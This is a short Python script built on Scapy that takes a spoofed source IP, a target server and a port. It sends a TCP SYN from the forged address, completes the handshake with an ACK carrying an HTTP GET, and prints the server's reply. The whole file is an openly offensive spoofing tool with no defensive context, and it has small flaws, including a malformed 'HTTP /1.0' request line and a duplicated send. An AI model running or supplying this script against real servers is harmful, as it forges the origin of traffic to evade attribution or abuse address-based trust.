import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import *
get = 'GET / HTTP /1.0\n\n'

if len(sys.argv) == 4:
    destination = sys.argv[2]
    destination_port = int(sys.argv[3])
    ip = IP(src = sys.argv[1],dst = destination)
else:
    print ("Usage: <script> spoofed_ip server_ip port")
    exit()
    
port = RandNum(1024,65535)

SYN = ip/TCP(sport = port, dport = destination_port, flags = "S" ,seq=0)

print ("\n[*] Sending SYN packet")
SYNACK = sr1(SYN)

ACK = ip/TCP(sport = SYNACK.dport, dport=destination_port, flags="A", seq=SYNACK.ack, ack=SYNACK.seq + 1)/get

print ("\n[*] Sending ACK-GET packet")
reply,error=sr(ACK)

print ("\n[*] Sending ACK-GET packet")
reply,error=sr(ACK)

print ("\n[*] Reply from server:")
print (reply.show())

print ('\n[*] Done!')

def parse(pkt):
    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        print (pkt.getlayer(Raw).load)
        
print ("Payload")
parse(reply[0][0])
parse(reply[0][1])